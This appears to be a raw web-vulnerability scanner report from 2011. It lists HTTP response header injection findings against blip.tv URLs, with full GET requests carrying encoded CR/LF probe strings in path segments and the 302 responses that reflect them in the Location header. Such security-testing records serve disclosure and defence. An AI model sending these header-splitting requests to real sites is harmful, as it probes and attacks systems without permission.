GET /file/d4d68%0d%0a1394314c0ea/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/d4d68 1394314c0ea/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 352 Date: Thu, 20 Jan 2011 00:38:20 GMT X-Varnish: 1248904208 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/d4d68 1394314c0ea/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 533e1%0d%0a211d4b35ff7 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/533e1%0d%0a211d4b35ff7 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/533e1 211d4b35ff7 Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:20 GMT X-Varnish: 1498215776 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/533e1 211d4b35ff7" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 62076%0d%0a4d4800ee83 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62076%0d%0a4d4800ee83/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/62076 4d4800ee83/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 360 Date: Thu, 20 Jan 2011 00:38:22 GMT X-Varnish: 2146044932 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/62076 4d4800ee83/get/Armcha ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 9f7c6%0d%0a842cf0637a0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/9f7c6%0d%0a842cf0637a0/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/9f7c6 842cf0637a0/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 362 Date: Thu, 20 Jan 2011 00:38:22 GMT X-Varnish: 2146044976 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/9f7c6 842cf0637a0/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 4d1fa%0d%0a052bf264571 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/4d1fa%0d%0a052bf264571 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/4d1fa 052bf264571 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:23 GMT X-Varnish: 1248904636 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/4d1fa 052bf264571" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 4374a%0d%0a4a21ba9df6e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4374a%0d%0a4a21ba9df6e/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/4374a 4a21ba9df6e/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 361 Date: Thu, 20 Jan 2011 00:38:21 GMT X-Varnish: 2146044716 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/4374a 4a21ba9df6e/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 1fc66%0d%0ad6afc4fff45 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/1fc66%0d%0ad6afc4fff45/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/1fc66 d6afc4fff45/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 70ee7%0d%0aa133d018d57 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/70ee7%0d%0aa133d018d57 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/70ee7 a133d018d57 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:21 GMT X-Varnish: 1274880934 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/70ee7 a133d018d57" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload db778%0d%0ac53aab65b12 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /db778%0d%0ac53aab65b12/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/db778 c53aab65b12/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 350 Date: Thu, 20 Jan 2011 00:38:20 GMT X-Varnish: 1324526368 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/db778 c53aab65b12/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload acb71%0d%0a5a85065288a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/acb71%0d%0a5a85065288a/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/acb71 5a85065288a/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 336 Date: Thu, 20 Jan 2011 00:38:20 GMT X-Varnish: 2146044616 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/acb71 5a85065288a/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload dd8c1%0d%0a6e997ed3acc was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/dd8c1%0d%0a6e997ed3acc HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/dd8c1 6e997ed3acc Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:20 GMT X-Varnish: 1324526444 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/dd8c1 6e997ed3acc" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 5d762%0d%0ad5b2cd9879d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5d762%0d%0ad5b2cd9879d/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/5d762 d5b2cd9879d/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 350 Date: Thu, 20 Jan 2011 00:38:23 GMT X-Varnish: 2146045095 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/5d762 d5b2cd9879d/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload e5932%0d%0abe8481e9c38 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/e5932%0d%0abe8481e9c38/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/e5932 be8481e9c38/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 336 Date: Thu, 20 Jan 2011 00:38:24 GMT X-Varnish: 2146045135 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/e5932 be8481e9c38/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 86269%0d%0a1601b24ec93 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/86269%0d%0a1601b24ec93 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/86269 1601b24ec93 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:24 GMT X-Varnish: 344226548 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/86269 1601b24ec93" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 76864%0d%0aee373237688 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /76864%0d%0aee373237688/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/76864 ee373237688/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 366 Date: Thu, 20 Jan 2011 00:38:03 GMT X-Varnish: 344223896 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/76864 ee373237688/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload e9027%0d%0aae40af891ce was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/e9027%0d%0aae40af891ce/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/e9027 ae40af891ce/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 Content-Type: text/html; charset=iso-8859-1 Content-Length: 367 Date: Thu, 20 Jan 2011 00:38:03 GMT X-Varnish: 1274878586 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/e9027 ae40af891ce/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 99974%0d%0a00d5354d6be was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/99974%0d%0a00d5354d6be HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/99974 00d5354d6be Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:04 GMT X-Varnish: 1274878615 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/99974 00d5354d6be" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload f0c72%0d%0a15d58a252b3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f0c72%0d%0a15d58a252b3/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/f0c72 15d58a252b3/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 351 Date: Thu, 20 Jan 2011 00:38:01 GMT X-Varnish: 1025263364 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/f0c72 15d58a252b3/get/Armch ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload eaa8a%0d%0a161c1066545 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/eaa8a%0d%0a161c1066545/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/eaa8a 161c1066545/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 352 Date: Thu, 20 Jan 2011 00:38:01 GMT X-Varnish: 344223635 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/eaa8a 161c1066545/Armc ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 6c793%0d%0a57e116ecbd8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/6c793%0d%0a57e116ecbd8 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/6c793 57e116ecbd8 Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:01 GMT X-Varnish: 1498213384 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/6c793 57e116ecbd8" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload c0c6e%0d%0a5695b90a4f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c0c6e%0d%0a5695b90a4f3/get/Askaninja-AskANinja011811ThatGlow264.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/c0c6e 5695b90a4f3/get/Askaninja-AskANinja011811ThatGlow264.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 338 Date: Thu, 20 Jan 2011 00:38:16 GMT X-Varnish: 1248903625 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/c0c6e 5695b90a4f3/get/Askan ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 79c8b%0d%0a3360beab2ff was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/79c8b%0d%0a3360beab2ff/Askaninja-AskANinja011811ThatGlow264.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/79c8b 3360beab2ff/Askaninja-AskANinja011811ThatGlow264.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 339 Date: Thu, 20 Jan 2011 00:38:16 GMT X-Varnish: 1324525882 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/79c8b 3360beab2ff/Aska ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload f97c7%0d%0ac3998e3c9c1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/f97c7%0d%0ac3998e3c9c1 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/f97c7 c3998e3c9c1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:17 GMT X-Varnish: 1248903716 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/f97c7 c3998e3c9c1" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload d02bd%0d%0a897d9453cba was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d02bd%0d%0a897d9453cba/get/Askaninja-AskANinja011811ThatGlow990.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/d02bd 897d9453cba/get/Askaninja-AskANinja011811ThatGlow990.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 338 Date: Thu, 20 Jan 2011 00:38:16 GMT X-Varnish: 344225551 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/d02bd 897d9453cba/get/Askan ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload feabf%0d%0a25bd50cd6ce was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
